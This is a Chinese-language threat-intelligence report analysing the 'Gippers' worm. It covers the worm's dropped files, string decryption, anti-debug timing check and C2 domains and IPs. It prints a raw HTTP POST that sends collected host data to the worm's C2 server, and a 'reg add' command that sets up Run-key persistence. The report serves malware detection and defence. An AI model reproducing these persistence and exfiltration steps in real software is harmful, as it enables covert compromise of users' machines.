【安全资讯】绵延不绝,老牌蠕虫“Gippers”分析报告
一、概况:
Gippers蠕虫的发现可以追溯到2014年,但直到今日,依旧会在各种威胁情报中心发现此家族样本的存在,可谓生命力十分强大,但是却鲜有分析文章,十分奇怪。
目前我们针对此家族样本做了详细分析,意义在于通过特征帮助安全研究员们进行分析和识别此类样本。
Gippers蠕虫 执行会释放sqlserver.exe、dumpkernel.exe恶意进程,采集系统隐私上传服务器,下载恶意文件对系统带来极大的危害。
二、样本分析:
➬ 初始化载荷
➀ 初始化配置信息,解密数据。
样本伪装成Server32History.exe,通过异或移位解密字符串。
字符串 |
C:\Windows\System32\Temp |
C:\Windows\Temp |
Dumpkernel.exe |
Sqlserver.exe |
U7spressx.exe |
➁ 创建载荷,攻击传播
创建载荷 | 文件类型 |
C:\Windows\Temp\sqlserver.exe | WIN32_PE |
C:\Windows\System32\dumpkernel.exe | WIN32_PE |
C:\Windows\Temp\Server32Hitory.exe | WIN32_PE |
C:\Windows\Temp\tttdelzzz.bat | bat |
C:\Windows\Temp\tttdeozzz.bat | bat |
C:\$\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Update.bat | bat |
➬ 组件分析
➂sqlserver.exe
1) 创建Event: newcard.dyndns.biz:80-1.30
2) 创建目录C:\Users\Desktop\logs,载荷运行后记录日志。
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders 请求startup键值,获取路径。
创建
C:\Users\AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup\Update.bat用来持久化sqlserver.exe.
3) 采集主机名-网络共享-版本信息等,C2回连。
4) Internet Settings.ProxyEnable查询浏览器代理是否开启,初始化ip。
url | ip |
newcard.dyndns.biz:80 | 5.79.71.205 |
newletter.dyndns.inf80-0x7530 | 178.162.203.202 |
5) 时间复杂度判断,Post数据会上传代码过程执行时间(应该是怕被分析),常用于反调试,如果过程时间较长将认定人为干涉。
POST http://newcard.dyndns.biz:80/result%3Fhl%3Den%26meta%3Dbfsygjivjgthaecqjskmfxbikgjkrkf HTTP/1.1 Accept: */* Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Connection: close Content-Length: 293 Content-Type: application/x-www-form-urlencoded Encoding: gzip, deflate Pragma: no-cache Host: newcard.dyndns.biz:80 |
➃tttbrozzz.exe
判断文件是否存在,如果存在,拷贝母体Server32Hisory.dat安静模式删除,执行母体和dumpkernel.exe,删除启动bat.
➄tttbrlzzz.exe
判断文件是否存在,存在则删除母体,删除自身.bat.
➅Updata.bat
➆dumpkernel.exe
图标是一个双向锤子,样本前半部分代码与上文初始化载荷如出一辙。
分支判断执行线路2,创建Pip匿名通道,创建cmd实现修改注册表CurrentVersion\Run自启动,键值为kernelfaultEx
C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Microsoft\windows\currentVersion\run /v kernelfaultEx /t REG_SZ /d "C:\Users\Desktop\logs\dumpkernel.exe" /f |
创建线程执行回调,执行创建文件,没有找到匹配文件。
➇Server32Hitory.exe
释放Server32Hitory.exe执行,来迷惑受害者。
三、情报关联:
ip关系错杂交乱,主要攻击源于欧洲地区德国荷兰。